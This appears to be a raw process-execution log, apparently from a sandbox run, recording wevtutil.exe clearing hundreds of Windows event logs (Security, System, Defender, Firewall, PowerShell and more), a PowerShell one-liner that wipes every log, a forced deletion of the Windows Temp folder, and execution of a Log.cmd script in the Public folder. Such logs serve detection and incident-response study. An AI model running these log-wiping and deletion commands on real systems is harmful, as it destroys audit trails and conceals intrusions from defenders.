"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WLAN-Autoconfig/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WLANConnectionFlow/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WMI-Activity/Trace

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WMPDMCCore/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WMPDMCUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WMPNSS-Service/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WMPNSSUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WPD-ClassInstaller/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WPD-ClassInstaller/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WPD-CompositeClassDriver/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WPD-CompositeClassDriver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WPD-MTPClassDriver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WSC-SRV/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WUSA/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WWAN-MM-Events/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WWAN-SVC-Events/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WWAN-UI-Events/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WebIO-NDF/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WebIO/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WebServices/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Win32k/Concurrency

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Win32k/Power

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Win32k/Render

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Win32k/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Win32k/UIPI

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinHTTP-NDF/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinHttp/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinINet/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinRM/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinRM/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinRM/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Windeploy/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Defender/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Defender/WHC"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsBackup/ActionCenter

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsColorSystem/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsColorSystem/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsSystemAssessmentTool/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsSystemAssessmentTool/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsUpdateClient/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Wininit/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Winlogon/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Winlogon/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Winsock-AFD/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Winsock-WS2HELP/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Winsrv/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Wired-AutoConfig/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Wired-AutoConfig/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Wordpad/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Wordpad/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Wordpad/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-mobsync/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ntshrui

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-osk/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-stobject/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl OAlerts

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Security

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Setup

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl System

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl TabletPC_InputPanel_Channel

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl WINDOWS_MP4SDECD_CHANNEL

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl WINDOWS_MSMPEG2VDEC_CHANNEL

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl WINDOWS_WMPHOTO_CHANNEL

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl WMPSetup

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl WMPSyncEngine

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Windows PowerShell"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl muxencode

C:\Windows\system32\cmd.exe

cmd /C "Del /S /F /Q %Windir%\Temp"

C:\Windows\system32\cmd.exe

cmd /C "powershell \"wevtutil el | Foreach-Object {wevtutil cl \"$_\"}\""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell \"wevtutil el | Foreach-Object {wevtutil cl \"$_\"}\"

C:\Windows\system32\cmd.exe

cmd /C C:\Users\Public\Log.cmd

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "wevtutil el | Foreach-Object {wevtutil cl "$_"}"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" el

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Application

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl DebugChannel

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl DirectShowFilterGraph

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl DirectShowPluginControl

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Els_Hyphenation/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl EndpointMapper

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl ForwardedEvents

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl HardwareEvents

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Internet Explorer"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Key Management Service"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MF_MediaFoundationDeviceProxy

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Media Center"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationDeviceProxy

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationPerformance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationPipeline

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationPlatform

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-IE/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-IEDVTOOL/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-IEFRAME/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-JSDumpHeap/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-PerfTrack-IEFRAME/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-PerfTrack-MSHTML/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ADSI/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-API-Tracing/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ATAPort/General

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ATAPort/SATA-LPM

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ActionQueue/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AltTab/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppID/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-AppLocker/EXE and DLL"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-AppLocker/MSI and Script"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Application Server-Applications/Admin"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Application Server-Applications/Analytic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Application Server-Applications/Debug"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Application Server-Applications/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Problem-Steps-Recorder

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Inventory

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Inventory/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Telemetry

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Audio/CaptureMonitor

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Audio/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Audio/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Audit/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Authentication User Interface/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AxInstallService/Log

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Backup

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Biometrics/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BitLocker-DrivePreparationTool/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BitLocker-DrivePreparationTool/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Bits-Client/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Bits-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Bluetooth-MTPEnum/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCache/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCacheEventProvider/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCacheSMB/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCacheSMB/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CAPI2/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CDROM/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-COM/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-COMRuntime/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Calculator/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Calculator/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CertPoleEng/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ClearTypeTextTuner/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CmiSetup/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CodeIntegrity/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CodeIntegrity/Verbose

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ComDlg32/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ComDlg32/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CorruptedFileRecovery-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CorruptedFileRecovery-Server/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CredUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crypto-RNG/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-D3D10Level9/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-D3D10Level9/PerfTiming

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DCLocator/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DNS-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DUSER/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DXGI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DXGI/Logging

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DXP/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DateTimeControlPanel/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DateTimeControlPanel/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DateTimeControlPanel/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Deplorch/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceSync/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceSync/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceUx/Informational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceUx/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcp-Client/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcp-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DhcpNap/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DhcpNap/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcpv6-Client/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcpv6-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DiagCpl/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-DPS/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-DPS/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-DPS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-MSDE/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PCW/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PCW/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PCW/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PLA/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PLA/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Perfhost/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scheduled/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scripted/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scripted/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scripted/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scripted/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-TaskManager/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-WDC/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-WDI/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Networking/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Networking/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Performance/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Performance/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D10/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D10_1/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D11/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D11/Logging

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D11/PerfTiming

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DirectShow-KernelSupport/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DirectSound/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DirectWrite-FontCache/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DirectWrite/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Disk/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DiskDiagnostic/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DiskDiagnosticDataCollector/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DiskDiagnosticResolver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DisplayColorCalibration/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DisplayColorCalibration/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DisplaySwitch/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Documents/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DriverFrameworks-UserMode/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxgKrnl/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxgKrnl/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxpTaskRingtone/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxpTaskSyncProvider/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EFS/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapHost/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapHost/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapHost/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EaseOfAccess/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventCollector/Debug

